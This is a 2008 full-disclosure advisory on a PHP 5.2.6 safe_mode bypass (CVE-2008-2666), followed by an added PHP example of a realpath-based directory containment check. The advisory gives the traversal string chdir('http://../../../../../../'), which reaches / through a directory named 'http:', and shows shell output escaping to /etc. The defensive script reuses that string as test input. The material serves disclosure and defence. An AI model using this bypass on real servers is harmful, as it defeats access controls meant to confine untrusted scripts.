-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- Written: 10.05.2008
- Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 55
CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6

Advisory URL: http://securityreason.com/achievement_securityalert/55

Vendor: http://www.php.net

--- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

chdir - Change directory

SYNOPSIS:
bool chdir ( string $directory )

http://pl.php.net/manual/en/function.chdir.php

ftok - Convert a pathname and a project identifier to a System V IPC key

SYNOPSIS:
int ftok ( string $pathname , string $proj )

http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX.
SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS

--- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---
Let's look at the chdir() function:

---
PHP_FUNCTION(chdir)
{
	char *str;
	int ret, str_len;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
		RETURN_FALSE;
	}

	if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
		RETURN_FALSE;
	}

	ret = VCWD_CHDIR(str);

	if (ret != 0) {
		php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno);
		RETURN_FALSE;
	}

	RETURN_TRUE;
}
---

str is being checked by safe_mode. Example:

---
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
---

In the current directory, we create a subdirectory named "http:".

=> it is possible to call chdir("http://../../../../../../") and we are in /

Why?

TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)))

for str="http://../../../../../../"

safe_mode will ignore all paths with http://

The same situation occurs with the ftok() function (and more).

---EXAMPLE1---
cxib# cat /www/wufff.php
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
---/EXAMPLE1---

---EXAMPLE2---
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x   2 www  www   512 Jun 17 17:12 .
drwxr-xr-x  19 www  www  4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
cxib# php /www/wufff.php
/www
/etc
cxib#
---/EXAMPLE2---

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX.
SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS

--- 2. How to fix ---
Do not use safe_mode as a main safety.

--- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe

--- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4 (FreeBSD)

iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9
W6fcb5TR6GxN9osji+wQCqM=
=tyyL
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
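As an added illustration of section 2 ("Do not use safe_mode as a main safety"), the following script shows what an application-level replacement for the safe_mode check looks like. It is example code written for this page, not code from the advisory or from PHP itself. The function name safe_chdir(), the base-directory policy and the scratch directory tree (which reproduces the "http:" subdirectory layout from EXAMPLE2) are assumptions; it assumes a POSIX filesystem where a directory may be named "http:".

```php
<?php
// Added example, not code from the advisory or from PHP itself.
// It shows an application-level directory containment check that does not
// rely on safe_mode: the requested directory is resolved with realpath()
// and accepted only if it lies inside an allowed base directory.
// The function name safe_chdir() and the demo tree are assumptions.

function safe_chdir(string $base, string $requested): bool
{
    $realBase = realpath($base);
    if ($realBase === false || !is_dir($realBase)) {
        return false;
    }

    // Reject anything shaped like a stream-wrapper URL ("http://", "ftp://", ...).
    // safe_mode skipped its uid check for paths with an http: prefix; a
    // replacement check must not treat such strings as trustworthy paths.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $requested) === 1) {
        return false;
    }

    // Resolve relative to the base directory. realpath() collapses "..",
    // duplicate separators and symlinks, so "http://../../../" cannot hide
    // where it really points.
    $target = realpath($realBase . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_dir($target)) {
        return false;
    }

    // Containment: $target is $realBase itself or starts with "$realBase/".
    $prefix = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $realBase && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return false;
    }

    return chdir($target);
}

// Constructed demo tree: a base directory holding a subdirectory literally
// named "http:", mirroring the layout shown in EXAMPLE2 of the advisory.
$original = getcwd();
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'safe_chdir_demo_' . getmypid();
mkdir($base);
mkdir($base . DIRECTORY_SEPARATOR . 'http:');
mkdir($base . DIRECTORY_SEPARATOR . 'ok');

// A plain subdirectory, the URL-shaped traversal from the advisory, a
// relative traversal, and the "http:" directory addressed as a normal name.
$cases = ['ok', 'http://../../../../../../', '../../etc', 'http:'];
foreach ($cases as $requested) {
    $allowed = safe_chdir($base, $requested);
    printf("%-28s => %s (cwd now %s)\n",
        $requested, $allowed ? 'allowed' : 'rejected', getcwd());
    chdir($base);
}

// Remove the scratch tree.
chdir($original);
rmdir($base . DIRECTORY_SEPARATOR . 'ok');
rmdir($base . DIRECTORY_SEPARATOR . 'http:');
rmdir($base);
```

The boundary here is enforced by resolving the path first and comparing the result against the allowed base, which is the same containment idea that open_basedir applies inside the engine (the php_check_open_basedir() call visible in the chdir() source above), rather than by safe_mode's file-ownership comparison. The "http:" directory itself is still reachable when named directly; only the URL-shaped string that safe_mode waved through is refused, and even without the prefix test the realpath() containment check would reject it because it resolves to /.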